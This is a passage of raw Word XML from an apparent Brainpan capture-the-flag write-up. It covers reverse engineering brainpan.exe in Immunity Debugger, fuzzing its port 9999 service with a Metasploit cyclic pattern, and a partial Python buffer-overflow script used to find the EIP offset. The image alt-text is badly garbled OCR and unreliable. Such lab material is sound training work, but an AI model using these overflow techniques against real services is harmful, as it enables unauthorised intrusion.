        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc141061109"/>
      <w:r w:rsidRPr="00F64A90">
        <w:lastRenderedPageBreak/>
        <w:t>Reverse Engineering brainpan.exe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="6FC2C87F" w14:textId="31332172" w:rsidR="00F64A90" w:rsidRDefault="00F64A90" w:rsidP="00F64A90">
      <w:r>
        <w:t>Immunity Debugger is a phenomenal tool for reverse engineering Windows executables.</w:t>
      </w:r>
      <w:r w:rsidR="007E36A4">
        <w:t xml:space="preserve"> Executing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the binary with Immunity Debugger presents the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B019FB" w14:textId="4004E7F2" w:rsidR="00F64A90" w:rsidRDefault="00F64A90" w:rsidP="00F64A90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7379042C" wp14:editId="25DA64B5">
            <wp:extent cx="6527178" cy="3609892"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="1716678166" name="Picture 3" descr="81171283 &#10;81171281 &#10;81171288 &#10;81171286 &#10;81171280 &#10;81171298 &#10;81171298 &#10;81171299 &#10;811712Aø &#10;811712A1 &#10;811712Aa &#10;811712% &#10;811712A0 &#10;81171288 &#10;81171288 &#10;81171289 &#10;811712cø &#10;811712c1 &#10;811712c7 &#10;811712c9 &#10;811712CA &#10;811712cc &#10;81171203 &#10;81171201 &#10;81171207 &#10;81171209 &#10;8117120A &#10;8117120c &#10;81171200 &#10;8117120E &#10;8117120F &#10;811712Eø &#10;811712Ea &#10;811712E4 &#10;811712E9 &#10;811712EA &#10;8117128 &#10;811712EC &#10;811712EE &#10;811712Fø &#10;811712Fa &#10;811712FS &#10;811712F8 &#10;811712F9 &#10;811712FA &#10;811712FB &#10;811712FC &#10;811712FF &#10;81171aøs &#10;al 172ØØØ &#10;al 172338 &#10;81172313 &#10;81172318 &#10;al 172323 &#10;al 172328 &#10;al 172øaø &#10;al 172088 &#10;al 172343 &#10;al 172048 &#10;al 172ØSØ &#10;al 172øs8 &#10;al 172ØSØ &#10;al 172368 &#10;al 172373 &#10;al 172378 &#10;al 172383 &#10;al 172388 &#10;al 172393 &#10;al 172398 &#10;al 172øqø &#10;al 1723A8 &#10;al 172383 &#10;al 172388 &#10;al 172ØCØ &#10;al 172øc8 &#10;al 172ØOØ &#10;al 172308 &#10;al 1723Eø &#10;al 1723E8 &#10;al 1723Fø &#10;al 1723F8 &#10;811721øø &#10;81172138 &#10;. EEC 38 &#10;. FFIS 2øs117a1 &#10;. EB B8FEFFFF &#10;. EEC 38 &#10;. FFIS 2øs117a1 &#10;. 98FEFFFF &#10;. 808426 øøøøøøl ES1,ow0R0 &#10;. 8830 acs117a1 &#10;807426 øø &#10;. 8830 aøs117a1 &#10;pusH &#10;EBP, ESP &#10;ESP,B &#10;. C7ø424 øløøøøl mou SS: [ESP] &#10;ow0R0 PTR OS: &#10;CALL &#10;CALL &#10;an an.a11711sø &#10;. 808426 øøøøøøl ES1,ow0R0 PTR OS: &#10;pusH &#10;EBP, ESP &#10;ESP,B &#10;. C7ø424 øaøøøøl mou SS: [ESP] &#10;ow0R0 PTR OS: &#10;CALL &#10;EAX &#10;Ecx &#10;Eox &#10;EBX &#10;ESP &#10;EBP &#10;ESI &#10;EOI &#10;EIP &#10;EFL &#10;øøøøøøøø &#10;øøøøøøøø &#10;øøøøøøøø &#10;øøaøøøøø &#10;øøsFEEFC &#10;øøsFEFsø &#10;øø61B8C8 &#10;øø61B8øø &#10;773420øc &#10;CALL &#10;an.a11711sø &#10;pusH &#10;Ecx, ow0R0 &#10;EBP, ESP &#10;pop &#10;LEA ES1,ow0R0 &#10;pusH &#10;Ecx, ow0R0 &#10;EBP, ESP &#10;pop &#10;pusH &#10;EBP, ESP &#10;pop &#10;pusH &#10;EBP, ESP &#10;pop &#10;pop &#10;pop &#10;pusH &#10;cs &#10;os &#10;332B &#10;øø2a &#10;332B &#10;332B &#10;øøsa &#10;332B &#10;ntdll &#10;82b it &#10;82b it &#10;82b it &#10;82b it &#10;82b it &#10;82b it &#10;. 773420øc &#10;2caøøø(FFF) &#10;PTR &#10;PTR &#10;PTR &#10;PTR &#10;OS: &#10;OS: cams &#10;OS: &#10;OS: cams &#10;r ERROR_succEss ( ØØØØØØØØ) &#10;øøøøøaøs &#10;SS &#10;øøøø &#10;RR7F &#10;initializing winsock.. .done. &#10;server socket created . &#10;bind done on port 9999 &#10;waiting for connections . &#10;cond ØØØØ &#10;n NEAR, 64 &#10;1737øøøø &#10;an .81171Aøø &#10;. 81EC &#10;. 8B4S &#10;1832øøøø &#10;38 &#10;mou &#10;sue &#10;mou &#10;EBP , ESP &#10;EAX &#10;ow0R0 &#10;ASCII &#10;DH*I... &#10;PTR &#10;SS: CEBP+8] &#10;10 &#1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1171283 &#10;81171281 &#10;81171288 &#10;81171286 &#10;81171280 &#10;81171298 &#10;81171298 &#10;81171299 &#10;811712Aø &#10;811712A1 &#10;811712Aa &#10;811712% &#10;811712A0 &#10;81171288 &#10;81171288 &#10;81171289 &#10;811712cø &#10;811712c1 &#10;811712c7 &#10;811712c9 &#10;811712CA &#10;811712cc &#10;81171203 &#10;81171201 &#10;81171207 &#10;81171209 &#10;8117120A &#10;8117120c &#10;81171200 &#10;8117120E &#10;8117120F &#10;811712Eø &#10;811712Ea &#10;811712E4 &#10;811712E9 &#10;811712EA &#10;8117128 &#10;811712EC &#10;811712EE &#10;811712Fø &#10;811712Fa &#10;811712FS &#10;811712F8 &#10;811712F9 &#10;811712FA &#10;811712FB &#10;811712FC &#10;811712FF &#10;81171aøs &#10;al 172ØØØ &#10;al 172338 &#10;81172313 &#10;81172318 &#10;al 172323 &#10;al 172328 &#10;al 172øaø &#10;al 172088 &#10;al 172343 &#10;al 172048 &#10;al 172ØSØ &#10;al 172øs8 &#10;al 172ØSØ &#10;al 172368 &#10;al 172373 &#10;al 172378 &#10;al 172383 &#10;al 172388 &#10;al 172393 &#10;al 172398 &#10;al 172øqø &#10;al 1723A8 &#10;al 172383 &#10;al 172388 &#10;al 172ØCØ &#10;al 172øc8 &#10;al 172ØOØ &#10;al 172308 &#10;al 1723Eø &#10;al 1723E8 &#10;al 1723Fø &#10;al 1723F8 &#10;811721øø &#10;81172138 &#10;. EEC 38 &#10;. FFIS 2øs117a1 &#10;. EB B8FEFFFF &#10;. EEC 38 &#10;. FFIS 2øs117a1 &#10;. 98FEFFFF &#10;. 808426 øøøøøøl ES1,ow0R0 &#10;. 8830 acs117a1 &#10;807426 øø &#10;. 8830 aøs117a1 &#10;pusH &#10;EBP, ESP &#10;ESP,B &#10;. C7ø424 øløøøøl mou SS: [ESP] &#10;ow0R0 PTR OS: &#10;CALL &#10;CALL &#10;an an.a11711sø &#10;. 808426 øøøøøøl ES1,ow0R0 PTR OS: &#10;pusH &#10;EBP, ESP &#10;ESP,B &#10;. C7ø424 øaøøøøl mou SS: [ESP] &#10;ow0R0 PTR OS: &#10;CALL &#10;EAX &#10;Ecx &#10;Eox &#10;EBX &#10;ESP &#10;EBP &#10;ESI &#10;EOI &#10;EIP &#10;EFL &#10;øøøøøøøø &#10;øøøøøøøø &#10;øøøøøøøø &#10;øøaøøøøø &#10;øøsFEEFC &#10;øøsFEFsø &#10;øø61B8C8 &#10;øø61B8øø &#10;773420øc &#10;CALL &#10;an.a11711sø &#10;pusH &#10;Ecx, ow0R0 &#10;EBP, ESP &#10;pop &#10;LEA ES1,ow0R0 &#10;pusH &#10;Ecx, ow0R0 &#10;EBP, ESP &#10;pop &#10;pusH &#10;EBP, ESP &#10;pop &#10;pusH &#10;EBP, ESP &#10;pop &#10;pop &#10;pop &#10;pusH &#10;cs &#10;os &#10;332B &#10;øø2a &#10;332B &#10;332B &#10;øøsa &#10;332B &#10;ntdll &#10;82b it &#10;82b it &#10;82b it &#10;82b it &#10;82b it &#10;82b it &#10;. 773420øc &#10;2caøøø(FFF) &#10;PTR &#10;PTR &#10;PTR &#10;PTR &#10;OS: &#10;OS: cams &#10;OS: &#10;OS: cams &#10;r ERROR_succEss ( ØØØØØØØØ) &#10;øøøøøaøs &#10;SS &#10;øøøø &#10;RR7F &#10;initializing winsock.. .done. &#10;server socket created . &#10;bind done on port 9999 &#10;waiting for connections . &#10;cond ØØØØ &#10;n NEAR, 64 &#10;1737øøøø &#10;an .81171Aøø &#10;. 81EC &#10;. 8B4S &#10;1832øøøø &#10;38 &#10;mou &#10;sue &#10;mou &#10;EBP , ESP &#10;EAX &#10;ow0R0 &#10;ASCII &#10;DH*I... &#10;PTR &#10;SS: CEBP+8] &#10;10 &#10;17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7444" cy="3632161"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="334CCE68" w14:textId="61A84822" w:rsidR="00F64A90" w:rsidRPr="009D488D" w:rsidRDefault="00F64A90" w:rsidP="009D488D">
      <w:r>
        <w:t>Connecting to the binary from our attacking machine shows that it is the same as the service running on port 9999 of the target system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578DD681" w14:textId="2119F180" w:rsidR="00F64A90" w:rsidRPr="005A15F0" w:rsidRDefault="00F64A90" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A15F0">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Local </w:t>
      </w:r>
      <w:r w:rsidR="00D33A1E">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A15F0">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nstance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3C85E3" w14:textId="77777777" w:rsidR="005A15F0" w:rsidRPr="005A15F0" w:rsidRDefault="005A15F0" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8C3D9D" w14:textId="4A3E152D" w:rsidR="00A44886" w:rsidRPr="005A15F0" w:rsidRDefault="00F64A90" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A15F0">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6306467E" wp14:editId="219D0D56">
            <wp:extent cx="5550010" cy="2675310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1114353581" name="Picture 4" descr="_LLI &#10;_LLI &#10;—/Desktop/THM/BraİnpanJ &#10;192.168.56.1 9999 &#10;_LLI &#10;_LLI &#10;_LLI &#10;(kaliS &#10;WELCOME TO BRAINPAN &#10;ENTER THE PASSWORD &#10;» test &#10;ACCESS DENIED &#10;—/Desktop/THM/Braİnpan &#10;C:userslhehaalsharedlbrainpan.exe &#10;1[+] initializing winsock.. .done. &#10;[+] server socket created . &#10;[+] bind done on port 9999 &#10;[+] waiting for connections. &#10;[+] received connection . &#10;[get_reply] s &#10;[test &#10;[get_reply] copied S bytes to buffer &#10;[+] check is 1 &#10;[get_reply] s &#10;[test &#10;[get_reply] copied S bytes to buff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LLI &#10;_LLI &#10;—/Desktop/THM/BraİnpanJ &#10;192.168.56.1 9999 &#10;_LLI &#10;_LLI &#10;_LLI &#10;(kaliS &#10;WELCOME TO BRAINPAN &#10;ENTER THE PASSWORD &#10;» test &#10;ACCESS DENIED &#10;—/Desktop/THM/Braİnpan &#10;C:userslhehaalsharedlbrainpan.exe &#10;1[+] initializing winsock.. .done. &#10;[+] server socket created . &#10;[+] bind done on port 9999 &#10;[+] waiting for connections. &#10;[+] received connection . &#10;[get_reply] s &#10;[test &#10;[get_reply] copied S bytes to buffer &#10;[+] check is 1 &#10;[get_reply] s &#10;[test &#10;[get_reply] copied S bytes to buffe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4344" cy="2711142"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54772E81" w14:textId="77777777" w:rsidR="00995644" w:rsidRDefault="00995644" w:rsidP="005E53A2"/>
    <w:p w14:paraId="3D18AAAC" w14:textId="0D73BBC0" w:rsidR="005A15F0" w:rsidRPr="005A15F0" w:rsidRDefault="005A15F0" w:rsidP="005E53A2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A15F0">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Target system</w:t>
      </w:r>
      <w:r w:rsidRPr="005A15F0">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="005A15F0">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0166F" w14:textId="4D298AF2" w:rsidR="005A15F0" w:rsidRDefault="00F64A90" w:rsidP="005E53A2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CAD7AA5" wp14:editId="28FEB42A">
            <wp:extent cx="3912041" cy="1685161"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1953375771" name="Picture 5" descr="—'Desktop/THM/Brainpan] &#10;10.10.148.248 9999 &#10;WELCOME TO BRAINPAN &#10;ENTER THE PASSWORD &#10;test &#10;ACCESS DEN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THM/Brainpan] &#10;10.10.148.248 9999 &#10;WELCOME TO BRAINPAN &#10;ENTER THE PASSWORD &#10;test &#10;ACCESS DENIE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0313" cy="1697340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65532A66" w14:textId="790C9DC0" w:rsidR="00826B72" w:rsidRDefault="00D33A1E" w:rsidP="005E53A2">
      <w:r>
        <w:t>Fuzzing the binary with a cyclic character pattern reveals the offset of the instruction pointer (EIP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2306F4" w14:textId="48C20F70" w:rsidR="00826B72" w:rsidRPr="002F3B52" w:rsidRDefault="00826B72" w:rsidP="005E53A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3B52">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cyclic pattern generation (1500 characters):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D768CC" w14:textId="5187E46E" w:rsidR="00D33A1E" w:rsidRDefault="00D33A1E" w:rsidP="005E53A2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11AD97D4" wp14:editId="1DA1A3BF">
            <wp:extent cx="6978817" cy="1121134"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1389910095" name="Picture 1" descr="msf-pattern_create -1, 1500 &#10;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1 &#10;9Дј адј здј 7 дј 8Дј 9дкадКIАК2дкз &#10;Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7 &#10;дивди9дкшд.пд.пдквдкщд..'5дкљдџ7дџ8додшадшпдрпдшздшддш5дш6дрпдш8додхадх1дх2дхздх4дх5дх6дх7дх8дх9дуаду1ду2дузду4ду5ду6ду7ду8ду9Д20Д21Д22Д23Д24Д25Д26Д27Д28Д29 &#10;Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1 &#10;звј 7 вј 9Bk0Bk1Bk2Bk3 &#10;Bk4Bk5Bk6Bk7Bk8Bk9BLOBUBUBEBUBL5BL6BL7BL8BL9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9B00B01B02B03B04B05B06B07B08B09Bp0Bp1Bp2Bp3Bp4Bp5 &#10;Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7 &#10;Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx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pattern_create -1, 1500 &#10;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1 &#10;9Дј адј здј 7 дј 8Дј 9дкадКIАК2дкз &#10;Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7 &#10;дивди9дкшд.пд.пдквдкщд..'5дкљдџ7дџ8додшадшпдрпдшздшддш5дш6дрпдш8додхадх1дх2дхздх4дх5дх6дх7дх8дх9дуаду1ду2дузду4ду5ду6ду7ду8ду9Д20Д21Д22Д23Д24Д25Д26Д27Д28Д29 &#10;Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1 &#10;звј 7 вј 9Bk0Bk1Bk2Bk3 &#10;Bk4Bk5Bk6Bk7Bk8Bk9BLOBUBUBEBUBL5BL6BL7BL8BL9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9B00B01B02B03B04B05B06B07B08B09Bp0Bp1Bp2Bp3Bp4Bp5 &#10;Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7 &#10;Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9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33575" cy="1129931"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A42EC" w14:textId="4C793087" w:rsidR="00826B72" w:rsidRPr="002F3B52" w:rsidRDefault="00826B72" w:rsidP="005E53A2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3B52">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Putting the cyclic pattern into the payload variable in the overflow script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425160CA" w14:textId="511F0927" w:rsidR="00826B72" w:rsidRDefault="00D33A1E" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="108D2757" wp14:editId="01FBCF3B">
            <wp:extent cx="3997075" cy="3347499"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715"/>
            <wp:docPr id="10993496" name="Picture 2" descr="import &#10;socket &#10;badchars &#10;port &#10;&quot;1ø.1ø.148.248&quot; &#10;9999 &#10;prefix &#10;offset &#10;overflow &#10;retn &#10;padding &#10;ayload &#10;postfix &#10;&quot;A&quot; * offset &#10;&quot;AaøAa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbøAb1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9 &#10;buffer &#10;prefix -v overflow -v retn + padding payload postfix &#10;socket.socket(socket .AF_INET, socket .SOCK_STREAM) &#10;s.connect((ip, port)) &#10;s.recv(1024) &#10;print( &quot;Sending evil buffer &#10;s.send(bytes(buffer * &#10;print( &quot;Done! &#10;except &#10;not connect. &quot;) &#10;&quot;latin-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 &#10;socket &#10;badchars &#10;port &#10;&quot;1ø.1ø.148.248&quot; &#10;9999 &#10;prefix &#10;offset &#10;overflow &#10;retn &#10;padding &#10;ayload &#10;postfix &#10;&quot;A&quot; * offset &#10;&quot;AaøAa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbøAb1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9 &#10;buffer &#10;prefix -v overflow -v retn + padding payload postfix &#10;socket.socket(socket .AF_INET, socket .SOCK_STREAM) &#10;s.connect((ip, port)) &#10;s.recv(1024) &#10;print( &quot;Sending evil buffer &#10;s.send(bytes(buffer * &#10;print( &quot;Done! &#10;except &#10;not connect. &quot;) &#10;&quot;latin-l&quo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2132" cy="3393609"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2690FA35" w14:textId="37972204" w:rsidR="00826B72" w:rsidRPr="00180DFA" w:rsidRDefault="00826B72" w:rsidP="3EFF00EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180DFA">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sending the payload to local instance and grabbing the EIP register value</w:t>
      </w:r>
      <w:r w:rsidR="00761A1D" w:rsidRPr="00180DFA">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> after crash</w:t>
      </w:r>
      <w:r w:rsidRPr="00180DFA">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C0AAED" w14:textId="46FB0238" w:rsidR="00D33A1E" w:rsidRDefault="00D33A1E" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6469414B" wp14:editId="307A8A45">
            <wp:extent cx="6858000" cy="2199640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="486846639" name="Picture 3" descr="Евр 72413372 &#10;3117128е &#10;ЕШ 1 311712BZ &#10;EIP 35724134 &#10;е ES е,егв &#10;Р 1 CS 023 t &#10;О SS воев B2e,lt &#10;е os вегв з2Ь'г. &#10;: FS eess 2c3eee(FFF) &#10;о а ( eeazzaeej &#10;S TI emQty 9 &#10;sT4 &#10;emQty 9 &#10;ST7 9 &#10;E spUoz01 &#10;в е (60 &#10;FST ezzz сопв &#10;FCW 037 F 1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Евр 72413372 &#10;3117128е &#10;ЕШ 1 311712BZ &#10;EIP 35724134 &#10;е ES е,егв &#10;Р 1 CS 023 t &#10;О SS воев B2e,lt &#10;е os вегв з2Ь'г. &#10;: FS eess 2c3eee(FFF) &#10;о а ( eeazzaeej &#10;S TI emQty 9 &#10;sT4 &#10;emQty 9 &#10;ST7 9 &#10;E spUoz01 &#10;в е (60 &#10;FST ezzz сопв &#10;FCW 037 F 1 1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199640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CC9D8F" w14:textId="0C94CBCF" w:rsidR="006B09D7" w:rsidRPr="0041289E" w:rsidRDefault="006B09D7" w:rsidP="3EFF00EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
